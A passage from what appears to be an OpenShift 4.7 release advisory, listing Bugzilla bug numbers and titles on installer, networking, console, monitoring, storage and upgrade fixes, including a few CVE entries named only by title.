ipv6 cluster 1872166 - 'Silences' link redirects to unexpected 'Alerts' view after creating a silence in the Developer perspective 1872251 - [aws-ebs-csi-driver] Verify job in CI doesn't check for vendor dir sanity 1872786 - Rules in kube-apiserver.rules are taking too long and consuming too much memory for Prometheus to evaluate them 1872821 - [DOC] Typo in Ansible Operator Tutorial 1872907 - Fail to create CR from generated Helm Base Operator 1872923 - Click "Cancel" button on the "initialization-resource" creation form page should send users to the "Operator details" page instead of "Install Operator" page (previous page) 1873007 - [downstream] failed to read config when running the operator-sdk in the home path 1873030 - Subscriptions without any candidate operators should cause resolution to fail 1873043 - Bump to latest available 1.19.x k8s 1873114 - Nodes goes into NotReady state (VMware) 1873288 - Changing Cluster-Wide Pull Secret Does Not Trigger Updates In Kubelet Filesystem 1873305 - Failed to power on /inspect node when using Redfish protocol 1873326 - Accessibility - The symbols e.g checkmark in the overview page has no text description, label, or other accessible information 1873480 - Accessibility - No text description, alt text, label, or other accessible information associated with the help icon: “?” button/icon in Developer Console ->Navigation 1873556 - [Openstack] HTTP_PROXY setting for NetworkManager-resolv-prepender not working 1873593 - MCO fails to cope with ContainerRuntimeConfig thas has a name > 63 characters 1874057 - Pod stuck in CreateContainerError - error msg="container_linux.go:348: starting container process caused \"chdir to cwd (\\"/mount-point\\") set in config.json failed: permission denied\"" 1874074 - [CNV] Windows 2019 Default Template Not Defaulting to Proper NIC/Storage Driver 1874192 - [RFE] "Create Backing Store" page doesn't allow to select already defined k8s secret as target bucket credentials when Google Cloud Storage is selected as a provider 1874240 - [vsphere] unable to deprovision - Runtime error list attached objects 1874248 - Include validation for vcenter host in the install-config 1874340 - vmware: NodeClockNotSynchronising alert is triggered in openshift cluster after upgrading form 4.4.16 to 4.5.6 1874583 - apiserver tries and fails to log an event when shutting down 1874584 - add retry for etcd errors in kube-apiserver 1874638 - Missing logging for nbctl daemon 1874736 - [downstream] no version info for the helm-operator 1874901 - add utm_source parameter to Red Hat Marketplace URLs for attribution 1874968 - Accessibility: The project selection drop down is a keyboard trap 1875247 - Dependency resolution error "found more than one head for channel" is unhelpful for users 1875516 - disabled scheduling is easy to miss in node page of OCP console 1875598 - machine status is Running for a master node which has been terminated from the console 1875806 - When creating a service of type "LoadBalancer" (Kuryr,OVN) communication through this loadbalancer failes after 2-5 minutes. 1876166 - need to be able to disable kube-apiserver connectivity checks 1876469 - Invalid doc link on yaml template schema description 1876701 - podCount specDescriptor change doesn't take effect on operand details page 1876815 - Installer uses the environment variable OS_CLOUD for manifest generation despite explicit prompt 1876935 - AWS volume snapshot is not deleted after the cluster is destroyed 1877071 - vSphere IPI - Nameserver limits were exceeded, some nameservers have been omitted 1877105 - add redfish to enabled_bios_interfaces 1877116 - e2e aws calico tests fail with rpc error: code = ResourceExhausted 1877273 - [OVN] EgressIP cannot fail over to available nodes after one egressIP node shutdown 1877648 - [sriov]VF from allocatable and capacity of node is incorrect when the policy is only 'rootDevices' 1877681 - Manually created PV can not be used 1877693 - dnsrecords specify recordTTL as 30 but the value is null in AWS Route 53 1877740 - RHCOS unable to get ip address during first boot 1877812 - [ROKS] IBM cloud failed to terminate OSDs when upgraded between internal builds of OCS 4.5 1877919 - panic in multus-admission-controller 1877924 - Cannot set BIOS config using Redfish with Dell iDracs 1878022 - Met imagestreamimport error when import the whole image repository 1878086 - OCP 4.6+OCS 4.6(multiple SC) Internal Mode- UI should populate the default "Filesystem Name" instead of providing a textbox, & the name should be validated 1878301 - [4.6] [UI] Unschedulable used to always be displayed when Node is Ready status 1878701 - After deleting and recreating a VM with same name, the VM events contain the events from the old VM 1878766 - CPU consumption on nodes is higher than the CPU count of the node. 1878772 - On the nodes there are up to 547 zombie processes caused by thanos and Prometheus. 1878823 - "oc adm release mirror" generating incomplete imageContentSources when using "--to" and "--to-release-image" 1878845 - 4.5 to 4.6.rc.4 upgrade failure: authentication operator health check connection refused for multitenant mode 1878900 - Installer complains about not enough vcpu for the baremetal flavor where generic bm flavor is being used 1878953 - RBAC error shows when normal user access pvc upload page 1878956 - oc api-resources does not include API version 1878972 - oc adm release mirror removes the architecture information 1879013 - [RFE]Improve CD-ROM interface selection 1879056 - UI should allow to change or unset the evictionStrategy 1879057 - [CSI Certificate Test] Test failed for CSI certification tests for CSIdriver openshift-storage.rbd.csi.ceph.com with RWX enabled 1879094 - RHCOS dhcp kernel parameters not working as expected 1879099 - Extra reboot during 4.5 -> 4.6 upgrade 1879244 - Error adding container to network "ipvlan-host-local": "master" field is required 1879248 - OLM Cert Dir for Webhooks does not align SDK/Kubebuilder 1879282 - Update OLM references to point to the OLM's new doc site 1879283 - panic after nil pointer dereference in pkg/daemon/update.go 1879365 - Overlapping, divergent openshift-cluster-storage-operator manifests 1879419 - [RFE]Improve boot source description for 'Container' and ‘URL’ 1879430 - openshift-object-counts quota is not dynamically updating as the resource is deleted. 1879565 - IPv6 installation fails on node-valid-hostname 1879777 - Overlapping, divergent openshift-machine-api namespace manifests 1879878 - Messages flooded in thanos-querier pod- oauth-proxy container: Authorization header does not start with 'Basic', skipping basic authentication in Log message in thanos-querier pod the oauth-proxy 1879930 - Annotations shouldn't be removed during object reconciliation 1879976 - No other channel visible from console 1880068 - image pruner is not aware of image policy annotation, StatefulSets, etc. 1880148 - dns daemonset rolls out slowly in large clusters 1880161 - Actuator Update calls should have fixed retry time 1880259 - additional network + OVN network installation failed 1880389 - Pipeline Runs with skipped Tasks incorrectly show Tasks as "Failed" 1880410 - Convert Pipeline Visualization node to SVG 1880417 - [vmware] Fail to boot with Secure Boot enabled, kernel lockdown denies iopl access to afterburn 1880443 - broken machine pool management on OpenStack 1880450 - Host failed to install because its installation stage joined took longer than expected 20m0s. 1880473 - IBM Cloudpak operators installation stuck "UpgradePending" with InstallPlan status updates failing due to size limitation 1880680 - [4.3] [Tigera plugin] - openshift-kube-proxy fails - Failed to execute iptables-restore: exit status 4 (iptables-restore v1.8.4 (nf_tables) 1880785 - CredentialsRequest missing description in oc explain 1880787 - No description for Provisioning CRD for oc explain 1880902 - need dnsPlocy set in crd ingresscontrollers 1880913 - [DeScheduler] - change loglevel from Info to Error when priority class given in the descheduler params is not present in the cluster 1881027 - Cluster installation fails at with error : the container name \"assisted-installer\" is already in use 1881046 - [OSP] openstack-cinder-csi-driver-operator doesn't contain required manifests and assets 1881155 - operator install authentication: Authentication require functional ingress which requires at least one schedulable and ready node 1881268 - Image uploading failed but wizard claim the source is available 1881322 - kube-scheduler not scheduling pods for certificates not renewed automatically after nodes restoration 1881347 - [v2v][ui]VM Import Wizard does not call Import provider cleanup 1881881 - unable to specify target port manually resulting in application not reachable 1881898 - misalignment of sub-title in quick start headers 1882022 - [vsphere][ipi] directory path is incomplete, terraform can't find the cluster 1882057 - Not able to select access modes for snapshot and clone 1882140 - No description for spec.kubeletConfig 1882176 - Master recovery instructions don't handle IP change well 1882191 - Installation fails against external resources which lack DNS Subject Alternative Name 1882209 - [ BateMetal IPI ] local coredns resolution not working 1882210 - [release 4.7] insights-operator: Fix bug in reflector not recovering from "Too large resource version" 1882268 - [e2e][automation]Add Integration Test for Snapshots 1882361 - Retrieve and expose the latest report for the cluster 1882485 - dns-node-resolver corrupts /etc/hosts if internal registry is not in use 1882556 - git:// protocol in origin tests is not currently proxied 1882569 - CNO: Replacing masters doesn't work for ovn-kubernetes 4.4 1882608 - Spot instance not getting created on AzureGovCloud 1882630 - Fstype is changed after deleting pv provisioned by localvolumeset instance 1882649 - IPI installer labels all images it uploads into glance as qcow2 1882653 - The Approval should display the Manual after the APPROVAL changed to Manual from the Automatic 1882658 - [RFE] Volume Snapshot is not listed under inventory in Project Details page 1882660 - Operators in a namespace should be installed together when approve one 1882667 - [ovn] br-ex Link not found when scale up RHEL worker 1882723 - [vsphere]Suggested mimimum value for providerspec not working 1882730 - z systems not reporting correct core count in recording rule 1882750 - [sig-api-machinery][Feature:APIServer][Late] kubelet terminates kube-apiserver gracefully 1882781 - nameserver= option to dracut creates extra NM connection profile 1882785 - Multi-Arch CI Jobs destroy libvirt network but occasionally leave it defined 1882844 - [IPI on vsphere] Executing 'openshift-installer destroy cluster' leaves installer tag categories in vsphere 1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability 1883388 - Bare Metal Hosts Details page doesn't show Mainitenance and Power On/Off status 1883422 - operator-sdk cleanup fail after installing operator with "run bundle" without installmode and og with ownnamespace 1883425 - Gather top installplans and their count 1883502 - Logging is broken due to mix of k8s.io/klog v1 and v2 1883523 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel] 1883538 - must gather report "cannot file manila/aws ebs/ovirt csi related namespaces and objects" error 1883560 - operator-registry image needs clean up in /tmp 1883563 - Creating duplicate namespace from create namespace modal breaks the UI 1883614 - [OCP 4.6] [UI] UI should not describe power cycle as "graceful" 1883642 - [sig-imageregistry][Feature:ImageTriggers][Serial] ImageStream admission TestImageStreamAdmitSpecUpdate 1883660 - e2e-metal-ipi CI job consistently failing on 4.4 1883765 - [user workload monitoring] improve latency of Thanos sidecar when streaming read requests 1883766 - [e2e][automation] Adjust tests for UI changes 1883768 - [user workload monitoring] The Prometheus operator should discard invalid TLS configurations 1883773 - opm alpha bundle build fails on win10 home 1883790 - revert "force cert rotation every couple days for development" in 4.7 1883803 - node pull secret feature is not working as expected 1883836 - Jenkins imagestream ubi8 and nodejs12 update 1883847 - The UI does not show checkbox for enable encryption at rest for OCS 1883853 - go list -m all does not work 1883905 - race condition in opm index add --overwrite-latest 1883946 - Understand why trident CSI pods are getting deleted by OCP 1884035 - Pods are illegally transitioning back to pending 1884041 - e2e should provide error info when minimum number of pods aren't ready in kube-system namespace 1884131 - oauth-proxy repository should run tests 1884165 - Repos should be disabled in -firstboot.service before OS extensions are applied 1884221 - IO becomes unhealthy due to a file change 1884258 - Node network alerts should work on ratio rather than absolute values 1884270 - Git clone does not support SCP-style ssh locations 1884334 - CVO marks an upgrade as failed when an operator takes more than 20 minutes to rollout 1884435 - vsphere - loopback is randomly not being added to resolver 1884565 - oauth-proxy crashes on invalid usage 1884584 - Kuryr controller continuously restarting due to unable to clean up Network Policy 1884613 - Create Instance of Prometheus from operator returns blank page for non cluster-admin users 1884628 - ovs-configuration service fails when the external network is configured on a tagged vlan on top of a bond device on a baremetal IPI deployment 1884629 - Visusally impaired user using screen reader not able to select Admin/Developer console options in drop down menu. 1884632 - Adding BYOK disk encryption through DES 1884654 - Utilization of a VMI is not populated 1884655 - KeyError on self._existing_vifs[port_id] 1884664 - Operator install page shows "installing..." instead of going to install status page 1884672 - Failed to inspect hardware. Reason: unable to start inspection: 'idrac' 1884691 - Installer blocks cloud-credential-operator manual mode on GCP and Azure 1884724 - Quick Start: Serverless quickstart doesn't match Operator install steps 1884739 - Node process segfaulted 1884824 - Update baremetal-operator libraries to k8s 1.19 1885002 - network kube-rbac-proxy scripts crashloop rather than non-crash looping 1885138 - Wrong detection of pending state in VM details 1885151 - [Cloud Team - Cluster API Provider Azure] Logging is broken due to mix of k8s.io/klog v1 and v2 1885165 - NoRunningOvnMaster alert falsely triggered 1885170 - Nil pointer when verifying images 1885173 - [e2e][automation] Add test for next run configuration feature 1885179 - oc image append fails on push (uploading a new layer) 1885213 - Vertical Pod Autoscaler (VPA) not working with DeploymentConfig 1885218 - [e2e][automation] Add virtctl to gating script 1885223 - Sync with upstream (fix panicking cluster-capacity binary) 1885235 - Prometheus: Logging is broken due to mix of k8s.io/klog v1 and v2 1885241 - kube-rbac-proxy: Logging is broken due to mix of k8s.io/klog v1 and v2 1885243 - prometheus-adapter: Logging is broken due to mix of k8s.io/klog v1 and v2 1885244 - prometheus-operator: Logging is broken due to mix of k8s.io/klog v1 and v2 1885246 - cluster-monitoring-operator: Logging is broken due to mix of k8s.io/klog v1 and v2 1885249 - openshift-state-metrics: Logging is broken due to mix of k8s.io/klog v1 and v2 1885308 - Supermicro nodes failed to boot via disk during installation when using IPMI and UEFI 1885315 - unit tests fail on slow disks 1885319 - Remove redundant use of group and kind of DataVolumeTemplate 1885343 - Console doesn't load in iOS Safari when using self-signed certificates 1885344 - 4.7 upgrade - dummy bug for 1880591 1885358 - add p&f configuration to protect openshift traffic 1885365 - MCO does not respect the install section of systemd files when enabling 1885376 - failed to initialize the cluster: Cluster operator marketplace is still updating 1885398 - CSV with only Webhook conversion can't be installed 1885403 - Some OLM events hide the underlying errors 1885414 - Need to disable HTX when not using HTTP/2 in order to preserve HTTP header name case 1885425 - opm index add cannot batch add multiple bundles that use skips 1885543 - node tuning operator builds and installs an unsigned RPM 1885644 - Panic output due to timeouts in openshift-apiserver 1885676 - [OCP 4.7]UI should fallback to minimal deployment only after total CPU < 30 || totalMemory < 72 GiB for initial deployment 1885702 - Cypress: Fix 'aria-hidden-focus' accesibility violations 1885706 - Cypress: Fix 'link-name' accesibility violation 1885761 - DNS fails to resolve in some pods 1885856 - Missing registry v1 protocol usage metric on telemetry 1885864 - Stalld service crashed under the worker node 1885930 - [release 4.7] Collect ServiceAccount statistics 1885940 - kuryr/demo image ping not working 1886007 - upgrade test with service type load balancer will never work 1886022 - Move range allocations to CRD's 1886028 - [BM][IPI] Failed to delete node after scale down 1886111 - UpdatingopenshiftStateMetricsFailed: DeploymentRollout of openshift-monitoring/openshift-state-metrics: got 1 unavailable replicas 1886134 - Need to set GODEBUG=x509ignoreCN=0 in initrd 1886154 - System roles are not present while trying to create new role binding through web console 1886166 - 1885517 Clone - Not needed for 4.7 - upgrade from 4.5->4.6 causes broadcast storm 1886168 - Remove Terminal Option for Windows Nodes 1886200 - greenwave / CVP is failing on bundle validations, cannot stage push 1886229 - Multipath support for RHCOS sysroot 1886294 - Unable to schedule a pod due to Insufficient ephemeral-storage 1886327 - Attempt to add a worker using bad roodDeviceHint: bmh and machine become Provisioned, no error in status 1886353 - [e2e][automation] kubevirt-gating job fails for a missing virtctl URL 1886397 - Move object-enum to console-shared 1886423 - New Affinities don't contain ID until saving 1886435 - Azure UPI uses deprecated command 'group deployment' 1886449 - p&f: add configuration to protect oauth server traffic 1886452 - layout options doesn't gets selected style on click i.e grey background 1886462 - IO doesn't recognize namespaces - 2 resources with the same name in 2 namespaces -> only 1 gets collected 1886488 - move e2e test off of nfs image from docker.io/gmontero/nfs-server:latest 1886524 - Change default terminal command for Windows Pods 1886553 - i/o timeout experienced from build02 when targeting CI test cluster during test execution 1886600 - panic: assignment to entry in nil map 1886620 - Application behind service load balancer with PDB is not disrupted 1886627 - Kube-apiserver pods restarting/reinitializing periodically 1886635 - CVE-2020-8563 kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider 1886636 - Panic in machine-config-operator 1886749 - Removing network policy from namespace causes inability to access pods through loadbalancer. 1886751 - Gather MachineConfigPools 1886766 - PVC dropdown has 'Persistent Volume' Label 1886834 - ovn-cert is mandatory in both master and node daemonsets 1886848 - [OSP] machine instance-state annotation discrepancy with providerStatus.instanceState 1886861 - ordered-values.yaml not honored if values.schema.json provided 1886871 - Neutron ports created for hostNetworking pods 1886890 - Overwrite jenkins-agent-base imagestream 1886900 - Cluster-version operator fills logs with "Manifest: ..." spew 1886922 - [sig-network] pods should successfully create sandboxes by getting pod 1886973 - Local storage operator doesn't include correctly populate LocalVolumeDiscoveryResult in console 1886977 - [v2v]Incorrect VM Provider type displayed in UI while importing VMs through VMIO 1887010 - Imagepruner met error "Job has reached the specified backoff limit" which causes image registry degraded 1887026 - FC volume attach fails with “no fc disk found” error on OCP 4.6 PowerVM cluster 1887040 - [upgrade] ovs pod crash for rhel worker when upgarde from 4.5 to 4.6 1887046 - Event for LSO need update to avoid confusion 1887088 - cluster-node-tuning-operator refers to missing cluster-node-tuned image 1887375 - User should be able to specify volumeMode when creating pvc from web-console 1887380 - Unsupported access mode should not be available to select when creating pvc by aws-ebs-csi-driver(gp2-csi) from web-console 1887392 - openshift-apiserver: delegated authn/z should have ttl > metrics/healthz/readyz/openapi interval 1887428 - oauth-apiserver service should be monitored by prometheus 1887441 - ingress misconfiguration may break authentication but ingress operator keeps reporting "degraded: False" 1887454 - [sig-storage] In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (ext4)] volumes should store data 1887456 - It is impossible to attach the default NIC to a bridge with the latest version of OVN Kubernetes 1887465 - Deleted project is still referenced 1887472 - unable to edit application group for KSVC via gestures (shift+Drag) 1887488 - OCP 4.6: Topology Manager OpenShift E2E test fails: gu workload attached to SRIOV networks should let resource-aligned PODs have working SRIOV network interface 1887509 - Openshift-tests conformance TopologyManager tests run when Machine Config Operator is not installed on cluster 1887525 - Failures to set master HardwareDetails cannot easily be debugged 1887545 - 4.5 to 4.6 upgrade fails when external network is configured on a bond device: ovs-configuration service fails and node becomes unreachable 1887585 - ovn-masters stuck in crashloop after scale test 1887651 - [Internal Mode] Object gateway (RGW) in unknown state after OCP upgrade. 1887737 - Test TestImageRegistryRemovedWithImages is failing on e2e-vsphere-operator 1887740 - cannot install descheduler operator after uninstalling it 1887745 - API server is throwing 5xx error code for 42.11% of requests for LIST events 1887750 - oc explain localvolumediscovery returns empty description 1887751 - oc explain localvolumediscoveryresult returns empty description 1887778 - Add ContainerRuntimeConfig gatherer 1887783 - PVC upload cannot continue after approve the certificate 1887797 - [CNV][V2V] Default network type is bridge for interface bound to POD network in VMWare migration wizard 1887799 - User workload monitoring prometheus-config-reloader OOM 1887850 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install test is flaky 1887863 - Installer panics on invalid flavor 1887864 - Clean up dependencies to avoid invalid scan flagging 1887934 - TestForwardedHeaderPolicyAppend, TestForwardedHeaderPolicyReplace, and TestForwardedHeaderPolicyIfNone consistently fail because of case-sensitive comparison 1887936 - Kube-scheduler should be able to parse v1beta1 KubeSchedulerConfig 1888015 - workaround kubelet graceful termination of static pods bug 1888028 - prevent extra cycle in aggregated apiservers 1888036 - Operator details shows old CRD versions 1888041 - non-terminating pods are going from running to pending 1888072 - Setting Supermicro node to PXE boot via Redfish doesn't take affect 1888073 - Operator controller continuously busy looping 1888118 - Memory requests not specified for image registry operator 1888150 - Install Operand Form on OperatorHub is displaying unformatted text 1888172 - PR 209 didn't update the sample archive, but machineset and pdbs are now namespaced 1888227 - Failed to deploy some of container image on the recent OCP 4.6 nightly build 1888292 - Fix CVE-2015-7501 affecting agent-maven-3.5 1888311 - p&f: make SAR traffic from oauth and openshift apiserver exempt 1888363 - namespaces crash in dev 1888378 - [IPI on Azure] errors destroying cluster when Azure resource group was never created 1888381 - instance:node_network_receive_bytes_excluding_lo:rate1m value twice expected 1888464 - installer missing permission definitions for TagResources and UntagResources when installing in existing VPC 1888494 - imagepruner pod is error when image registry storage is not configured 1888565 - [OSP] machine-config-daemon-firstboot.service failed with "error reading osImageURL from rpm-ostree" 1888595 - cluster-policy-controller logs shows error which reads initial monitor sync has error 1888601 - The poddisruptionbudgets is using the operator service account, instead of gather 1888657 - oc doesn't know its name 1888663 - sdn starts after kube-apiserver, delay readyz until oauth-apiserver is reachable 1888671 - Document the Cloud Provider's ignore-volume-az setting 1888738 - quay.io/openshift/origin-must-gather:latest is not a multi-arch, manifest-list image 1888763 - at least one of these parameters (Vendor, DeviceID or PfNames) has to be defined in nicSelector in CR %s", cr.GetName() 1888827 - ovnkube-master may segfault when trying to add IPs to a nil address set 1888861 - need to pass dual-stack service CIDRs to kube-apiserver in dual-stack cluster 1888866 - AggregatedAPIDown permanently firing after removing APIService 1888870 - JS error when using autocomplete in YAML editor 1888874 - hover message are not shown for some properties 1888900 - align plugins versions 1888985 - Cypress: Fix 'Ensures buttons have discernible text' accesibility violation 1889213 - The error message of uploading failure is not clear enough 1889267 - Increase the time out for creating template and upload image in the terraform 1889348 - Project link should be removed from Application Details page, since it is inaccurate (Application Stages) 1889374 - Kiali feature won't work on fresh 4.6 cluster 1889388 - ListBundles returns incorrect replaces/skips when bundles have been added via semver-skippatch mode 1889420 - OCP failed to add vsphere disk when pod moved to new node during cluster upgrade 1889515 - Accessibility - The symbols e.g checkmark in the Node > overview page has no text description, label, or other accessible information 1889529 - [Init-CR annotation] Inline alert shows operand instance was needed still appearing after creating an Operand instance 1889540 - [4.5 upgrade][alert]CloudCredentialOperatorDown 1889577 - Resources are not shown on project workloads page 1889620 - [Azure] - Machineset not scaling when publicIP:true in disconnected Azure enviroment 1889630 - Scheduling disabled popovers are missing for Node status in Node Overview and Details pages 1889692 - Selected Capacity is showing wrong size 1889694 - usbguard fails to install as RHCOS extension due to missing libprotobuf.so.15 1889698 - When the user clicked cancel at the Create Storage Class confirmation dialog all the data from the Local volume set goes off 1889710 - Prometheus metrics on disk take more space compared to OCP 4.5 1889721 - opm index add semver-skippatch mode does not respect prerelease versions 1889724 - When LocalVolumeDiscovery CR is created form the LSO page User doesn't see the Disk tab 1889767 - [vsphere] Remove certificate from upi-installer image 1889779 - error when destroying a vSphere installation that failed early 1889787 - OCP is flooding the oVirt engine with auth errors 1889838 - race in Operator update after fix from bz1888073 1889852 - support new AWS regions ap-east-1, af-south-1, eu-south-1 1889863 - Router prints incorrect log message for namespace label selector 1889891 - Backport timecache LRU fix 1889912 - Drains can cause high CPU usage 1889921 - Reported Degraded=False Available=False pair does not make sense 1889928 - [e2e][automation] Add more tests for golden os 1889943 - EgressNetworkPolicy does not work when setting Allow rule to a dnsName 1890038 - Infrastructure status.platform not migrated to status.platformStatus causes warnings 1890074 - MCO extension kernel-headers is invalid 1890104 - with Serverless 1.10 version of trigger/subscription/channel/IMC is V1 as latest 1890130 - multitenant mode consistently fails CI 1890141 - move off docker.io images for build/image-eco/templates/jenkins e2e 1890145 - The mismatched of font size for Status Ready and Health Check secondary text 1890180 - FieldDependency x-descriptor doesn't support non-sibling fields 1890182 - DaemonSet with existing owner garbage collected 1890228 - AWS: destroy stuck on route53 hosted zone not found 1890235 - e2e: update Protractor's checkErrors logging 1890250 - workers may fail to join the cluster during an update from 4.5 1890256 - Replacing a master node on a baremetal IPI deployment gets stuck when deleting the machine of the unhealthy member 1890270 - External IP doesn't work if the IP address is not assigned to a node 1890361 - s390x: Generate new ostree rpm with fix for rootfs immutability 1890456 - [vsphere] mapi_instance_create_failed doesn't work on vsphere 1890467 - unable to edit an application without a service 1890472 - [Kuryr] Bulk port creation exception not completely formatted 1890494 - Error assigning Egress IP on GCP 1890530 - cluster-policy-controller doesn't gracefully terminate 1890630 - [Kuryr] Available port count not correctly calculated for alerts 1890671 - [SA] verify-image-signature using service account does not work 1890677 - 'oc image info' claims 'does not exist' for application/vnd.oci.image.manifest.v1+json manifest 1890808 - New etcd alerts need to be added to the monitoring stack 1890951 - Mirror of multiarch images together with cluster logging case problems. It doesn't sync the "overall" sha it syncs only the sub arch sha. 1890984 - Rename operator-webhook-config to sriov-operator-webhook-config 1890995 - wew-app should provide more insight into why image deployment failed 1891023 - ovn-kubernetes rbac proxy never starts waiting for an incorrect API call 1891047 - Helm chart fails to install using developer console because of TLS certificate error 1891068 - [sig-instrumentation] Prometheus when installed on the cluster shouldn't report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured [Early] failing due to TargetDown alert from kube-scheduler 1891080 - [LSO] When Localvolumeset and SC is already created before OCS install Creation of LVD and LVS is skipped when user click created storage cluster from UI 1891108 - p&f: Increase the concurrency share of workload-low priority level 1891143 - CVO deadlocked while shutting down, shortly after fresh cluster install (metrics goroutine) 1891189 - [LSO] max device limit is accepting negative values. PVC is not getting created and no error is shown 1891314 - Display incompatible helm charts for installation (kubeVersion of cluster doesn't meet requirements of chart) 1891362 - Wrong metrics count for openshift_build_result_total 1891368 - fync should be fsync for etcdHighFsyncDurations alert's annotations.message 1891374 - fync should be fsync for etcdHighFsyncDurations critical alert's annotations.message 1891376 - Extra text in Cluster Utilization charts 1891419 - Wrong detail head on network policy detail page. 1891459 - Snapshot tests should report stderr of failed commands 1891498 - Other machine config pools do not show during update 1891543 - OpenShift 4.6/OSP install fails when node flavor has less than 25GB, even with dedicated storage 1891551 - Clusterautoscaler doesn't scale up as expected 1891552 - Handle missing labels as empty. 1891555 - The windows oc.exe binary does not have version metadata 1891559 - kuryr-cni cannot start new thread 1891614 - [mlx] testpmd fails inside OpenShift pod using DevX version 19.11 1891625 - [Release 4.7] Mutable LoadBalancer Scope 1891702 - installer get pending when additionalTrustBundle is added into install-config.yaml 1891716 - OVN cluster upgrade from 4.6.1 to 4.7 fails 1891740 - OperatorStatusChanged is noisy 1891758 - the authentication operator may spam DeploymentUpdated event endlessly 1891759 - Dockerfile builds cannot change /etc/pki/ca-trust 1891816 - [UPI] [OSP] control-plane.yml provisioning playbook fails on OSP 16.1 1891825 - Error message not very informative in case of mode mismatch 1891898 - The ClusterServiceVersion can define Webhooks that cannot be created. 1891951 - UI should show warning while creating pools with compression on 1891952 - [Release 4.7] Apps Domain Enhancement 1891993 - 4.5 to 4.6 upgrade doesn't remove deployments created by marketplace 1891995 - OperatorHub displaying old content 1891999 - Storage efficiency card showing wrong compression ratio 1892004 - OCP 4.6 opm on Ubuntu 18.04.4 - error /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.28' not found (required by ./opm) 1892167 - [SR-IOV] SriovNetworkNodePolicies apply ignoring the spec.nodeSelector. 1892198 - TypeError in 'Performance Profile' tab displayed for 'Performance Addon Operator' 1892288 - assisted install workflow creates excessive control-plane disruption 1892338 - HAProxyReloadFail alert only briefly fires in the event of a broken HAProxy config 1892358 - [e2e][automation] update feature gate for kubevirt-gating job 1892376 - Deleted netnamespace could not be re-created 1892390 - TestOverwrite/OverwriteBundle/DefaultBehavior in operator-registry is flaky 1892393 - TestListPackages is flaky 1892448 - MCDPivotError alert/metric missing 1892457 - NTO-shipped stalld needs to use FIFO for boosting. 1892467 - linuxptp-daemon crash 1892521 - [AWS] Startup bootstrap machine failed due to ignition file is missing in disconnected UPI env 1892653 - User is unable to create KafkaSource with v1beta 1892724 - VFS added to the list of devices of the nodeptpdevice CRD 1892799 - Mounting additionalTrustBundle in the operator 1893117 - Maintenance mode on vSphere blocks installation. 1893351 - TLS secrets are not able to edit on console. 1893362 - The ovs-xxxxx_openshift-sdn container does not terminate gracefully, slowing down reboots 1893386 - false-positive ReadyIngressNodes_NoReadyIngressNodes: Auth operator makes risky "worker" assumption when guessing about ingress availability 1893546 - Deploy using virtual media fails on node cleaning step 1893601 - overview filesystem utilization of OCP is showing the wrong values 1893645 - oc describe route SIGSEGV 1893648 - Ironic image building process is not compatible with UEFI secure boot 1893724 - OperatorHub generates incorrect RBAC 1893739 - Force deletion doesn't work for snapshots if snapshotclass is already deleted 1893776 - No useful metrics for image pull time available, making debugging issues there impossible 1893798 - Lots of error messages starting with "get namespace to enqueue Alertmanager instances failed" in the logs of prometheus-operator 1893832 - ErrorCount field is missing in baremetalhosts.metal3.io CRD 1893889 - disabled dropdown items in the pf dropdown component are skipped over and unannounced by JAWS 1893926 - Some "Dynamic PV (block volmode)" pattern storage e2e tests are wrongly skipped 1893944 - Wrong product name for Multicloud Object Gateway 1893953 - (release-4.7) Gather default StatefulSet configs 1893956 - Installation always fails at "failed to initialize the cluster: Cluster operator image-registry is still updating" 1893963 - [Testday] Workloads-> Virtualization is not loading for Firefox browser 1893972 - Should skip e2e test cases as early as possible 1894013 - [v2v][Testday] VMware to CNV VM import]VMware URL: It is not clear that only the FQDN/IP address is required without 'https://' 1894020 - User with edit users cannot deploy images from their own namespace from the developer perspective 1894025 - OCP 4.5 to 4.6 upgrade for "aws-ebs-csi-driver-operator" fails when "defaultNodeSelector" is set 1894041 - [v2v][[Testday]VM import from VMware/RHV] VM import wizard: The target storage class name is not displayed if default storage class is used. 1894065 - tag new packages to enable TLS support 1894110 - Console shows wrong value for maxUnavailable and maxSurge when set to 0 1894144 - CI runs of baremetal IPI are failing due to newer libvirt libraries 1894146 - ironic-api used by metal3 is over provisioned and consumes a lot of RAM 1894194 - KuryrPorts leftovers from 4.6 GA need to be deleted 1894210 - Failed to encrypt OSDs on OCS4.6 installation (via UI) 1894216 - Improve OpenShift Web Console availability 1894275 - Fix CRO owners file to reflect node owner 1894278 - "database is locked" error when adding bundle to index image 1894330 - upgrade channels needs to be updated for 4.7 1894342 - oauth-apiserver logs many "[SHOULD NOT HAPPEN] failed to update managedFields for ... OAuthClient ... no corresponding type for oauth.openshift.io/v1, Kind=OAuthClient" 1894374 - Dont prevent the user from uploading a file with incorrect extension 1894432 - [oVirt] sometimes installer timeout on tmp_import_vm 1894477 - bash syntax error in nodeip-configuration.service 1894503 - add automated test for Polarion CNV-5045 1894519 - [OSP] External mode cluster creation disabled for Openstack and oVirt platform 1894539 - [on-prem] Unable to deploy additional machinesets on separate subnets 1894645 - Cinder volume provisioning crashes on nil cloud provider 1894677 - image-pruner job is panicking: klog stack 1894810 - Remove TechPreview Badge from Eventing in Serverless version 1.11.0 1894860 - 'backend' CI job passing despite failing tests 1894910 - Update the node to use the real-time kernel fails 1894992 - All nightly jobs for e2e-metal-ipi failing due to ipa image missing tenacity package 1895065 - Schema / Samples / Snippets Tabs are all selected at the same time 1895099 - vsphere-upi and vsphere-upi-serial jobs time out waiting for bootstrap to complete in CI 1895141 - panic in service-ca injector 1895147 - Remove memory limits on openshift-dns 1895169 - VM Template does not properly manage Mount Windows guest tools check box during VM creation 1895268 - The bundleAPIs should NOT be empty 1895309 - [OCP v47] The RHEL node scaleup fails due to "No package matching 'cri-o-1.19.*' found available" on OCP 4.7 cluster 1895329 - The infra index filled with warnings "WARNING: kubernetes.io/cinder built-in volume provider is now deprecated. The Cinder volume provider is deprecated and will be removed in a future release" 1895360 - Machine Config Daemon removes a file although its defined in the dropin 1895367 - Missing image in metadata DB index.db in disconnected Operator Hub installation. OCP 4.6.1 1895372 - Web console going blank after selecting any operator to install from OperatorHub 1895385 - Revert KUBELET_LOG_LEVEL back to level 3 